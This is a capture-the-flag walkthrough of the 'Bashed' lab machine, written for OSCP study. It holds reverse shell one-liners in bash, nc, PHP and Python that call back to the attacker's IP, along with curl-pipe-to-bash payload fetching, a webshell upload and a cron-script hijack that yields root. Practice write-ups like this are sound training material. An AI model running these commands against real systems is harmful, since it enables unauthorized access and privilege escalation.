Bash.. Kapow!

 

Come one, come all! Who is here for some OSCP knowledge? As promised a new IPPSec write up has arrived! And, I have decided to do a write up for every tutorial in the OSCP prep series found here: IPPSEC OSCP prep videos

Alright, alright.. Without further ado, I present to you… BASHED!

Using Cherry Tree to take notes while performing an exploit.

Open Cherry Tree

Ctrl+ N = New Tree

Ctrl+Shift+N = New Branch (Sub Notes for new commands)

PrtSc to take screen shots

Let’s get to the Box!

root@kali:~# nmap -sC -sV -oA nmap/initial IP.OF.TAR.GET

  • sC = Default nmap scripts
  • sV = Enumerate Version
  • oA = Output All formats

Next would be your directory/folder

Then IP of the target

root@kali:~# cat nmap/initial.nmap

  • cat allows you to view the contents of the file

We see that port 80 is open and it is running: Apache https 2.4.18 Ubuntu

Copy and past the contents into Cherry Tree

Let’s check the version of Ubuntu running by checking the Apache version.

Open Google and Search for: ubuntu httpd versions

  • Click packages.ubuntu.com Apache 2
  • We will discover that Xenial 16.04 will be running version 2.4.18
  • Enter that discovered information into Cherry Tree

Browse to the IP.OF.TAR.GET and see if it returns a WebPage

  • Returns phpbash
  • Has a link to a GitHub page
  • Browse to the “Exact server” link and see that a webshell program was developed

Browse to the GitHub Page for phpbash

  • Copy the code into Cherry Tree
  • Create a New Branch and Paste it.. Might be useful later

Now Let’s Run GoBuster on the site for anything useful

Gobuster is a tool used to brute-force:

  • URIs (directories and files) in web sites.
  • DNS subdomains (with wildcard support).

https://tools.kali.org/web-applications/gobuster

root@kali:~# /opt/gobuster/gobuster -u http://IP.OF.TARGET -w /usr/share/wordlists/dirbuster/directory-lists-2.3-medium.txt

  • -w = wordlist

Let’s browse to the different directories we find

  • OF.TAR.GET/directory
  • Take screenshots of what you find and add it to a new branch

So far we have found:

  • php
  • min.php
  • php

Click on the link: phpbash.php

Run the following:

  • Id
  • Hostname
  • Ifconfig

See what information was returned.

Verifies it was on the server itself.

  • Take a screenshot and add it to Cherry Tree

Kill the GoBuster and let’s run a Linux Privelge Checker on the host

root@kali:~# cp /opt/li

root@kali:~# cp /opt/linux_privesc/

root@kali:~# cp /opt/linux_privesc/LinEnum.sh .

root@kali:~# python -m SimpleHTTPServer 80

We are going to Post the enum to the Simple HTTP server

Switch over to the Browser location: IP.OF.TAR.GET/dev/phpbash.php

Run the following:

www-data@bashed:/var/www/html/dev# curl IP.OF.YOU.RPC/LinEnum.sh | bash

  • Sad face.. didn’t work
  • Tried wget didn’t work here.. let’s change directories

www-data@bashed:/var/www/html/dev# cd /dev/shm

www-data@bashed:/dev/shm# wget IP.OF.YOU.RPC/LinEnum.sh

  • It’s running!

www-data@bashed:/dev/shm# ls

  • Give it a minute to run
  • Copy and Paste all the Output to a new branch in Cherry Tree

When looking through the data, keep this in mind:

  • root user has the UID of 0. Most Linux distributions reserve the first 100 UIDs for system use. New users are assigned UIDs starting from 500 or 1000. For example, new users in Ubuntu start from 1000
  • When you create a new account, it will usually be give the next-highest unused number. If we create a new user on our Ubuntu system, it will be given the UID of 1001:

We also find we can run sudo without applying a password

Remember.. the phpbash shell is not persistent. When you send commands, it sends them one at a time and respawns a new shell

Need to perform a reverse shell to get a persistent shell

Switch back to your box

PenTestMonkey: Reverse shell cheat sheet:

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Let’s set up a listener on our host machine

root@kali:~# nc -lvnp 8081

Switch back to the phpbash shell

www-data@bashed:/dev/shm# bash -i >& /dev/tcp/IP.OF.YOU.RPC/8081 0>&1

  • No call back.. let’s try the Net Cat one.. more reliable!

www-data@bashed:/dev/shm# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP.OF.YOU.RPC 8081 >/tmp/f 

  • Still no shell.. hmmm let’s try the PHP One

www-data@bashed:/dev/shm# php -r ‘$sock=fsockopen(“IP.OF.YOU.RPC”,8081);exec(“/bin/sh -i <&3 >&3 2>&3”); ·         Hmmm still no shell. Let’s go back and review phpbash code·         We discover that it is appending a redirect·         Let’s try uploading a reverse shell, then executing it If you remember from GoBuster there was a /uploads directory www-data@bashed:/dev/shm# cd /var/www/html/uploads www-data@bashed:/var/www.html/uploads# ls·         Nothing in therewww-data@bashed:/var/www.html/uploads# touch test ·         This will create a file in the directoryIn your Browses go back to:

http://IP.OF.TAR.GET/uploads/test

·         The file is present! We know because we didn’t get a 404 errorWith our nc listener still running, let’s create a php reverse shell

  • The PhP rever shell is on Kali Linux by default

Open another terminal window

root@kali:~# cp /opt/shell/php/php-reverse-shell.php .

  • Now that we have copied it into our directory, let’s verify some settings

root@kali:~# vi php-reverse-shell.php

  • Check the IP (your IP)
  • Port: 8081

Now let’s ensure our Python Simple HTTP Server is still running

root@kali:~# python -m SimpleHTTPServer 80

  • . still running yeah?

Switch back to the Browser php shell

www-data@bashed:/var/www.html/uploads# wget 10.10.14.30/php-reverse-shell.php

It is uploaded.. now navigate to it

http://IP.OF.TAR.GET/uploads/php-reverse-shell.php

Switch back to your terminal where Net Cat listener is running

Sweet.. we got a shell

$ id

  • To see who we are (rights)

$ python -c ‘import pty;pty.spawn(“/bin/bash”)’

  • Now we have a bash shell

www-data@bashed:/$ ^Z

^=ctrl

root@kali:~# sty raw -echo

root@kali:~# nc -lvnp 8081

www-data@bashed:/$ sudo -u scriptmanager bash

scriptmanager@bashed:/$ id

  • Now we are the scriptmanager user

scriptmanager@bashed:/$ ls -la

  • We see a folder called scripts.. most likely belongs to the scriptmanager

scriptmanager@bashed:/$ cd scripts

scriptmanager@bashed:/scripts$ ls -la

  • py
  • txt

scriptmanager@bashed:/scripts$ date

  • If we keep running the date command we will see that test.txt keeps getting updated every minute
  • Let’s take a look at that test.py and see what it is doing but first lets bring our bash commands back in

scriptmanager@bashed:/scripts$ python -c ‘import pty;pty.spawn(“/bin/bash”)’

scriptmanager@bashed:/scripts$ vi test.py

  • We see that it opening test.txt, writing ‘testting 123!’ to it and then closing it

Let’s edit that test.py

And paste in the python reverse shell code from PentTestMonkey

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Note: Make sure you edit this to make applicable

  • Get rid of the semicolons and make them new lines
  • Change the IP to your machine

Now let’s run our newly edited test.py

scriptmanager@bashed:/scripts$ test.py

Go back to terminal and run a new listener

root@kali:~# nc -lvnp 1234

  • Now would be a good time add some notes to CherryTree
  • Did you get a shell? I got a shell… totes got a shell
  • Guess what.. we also got root.. because root owns the test.txt file

# id

Uid=(root)

Note: You may have to stop and start the listener a few times.

# cd /root

# ls

  • We see root.txt

# wc -c root.txt

  • Its 32 characters which tells us its an md5sum

Yay!!! All done.. we kick arse!

#donecodealone